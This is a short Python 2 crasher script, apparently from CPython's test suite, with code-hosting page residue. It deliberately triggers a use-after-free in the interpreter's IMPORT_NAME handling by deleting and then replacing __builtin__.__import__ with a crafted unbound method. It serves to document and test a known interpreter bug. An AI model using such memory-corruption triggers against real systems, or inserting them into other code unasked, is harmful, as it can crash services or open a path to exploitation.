29 lines
753 B
Python
29 lines
753 B
Python
"""
|
|
PyDict_GetItem() returns a borrowed reference.
|
|
This attack is against ceval.c:IMPORT_NAME, which calls an
|
|
object (__builtin__.__import__) without holding a reference to it.
|
|
"""
|
|
|
|
import types
|
|
import __builtin__
|
|
|
|
|
|
class X(object):
|
|
def __getattr__(self, name):
|
|
# this is called with name == '__bases__' by PyObject_IsInstance()
|
|
# during the unbound method call -- it frees the unbound method
|
|
# itself before it invokes its im_func.
|
|
del __builtin__.__import__
|
|
return ()
|
|
|
|
pseudoclass = X()
|
|
|
|
class Y(object):
|
|
def __call__(self, *args):
|
|
# 'self' was freed already
|
|
print self, args
|
|
|
|
# make an unbound method
|
|
__builtin__.__import__ = types.MethodType(Y(), None, (pseudoclass, str))
|
|
import spam
|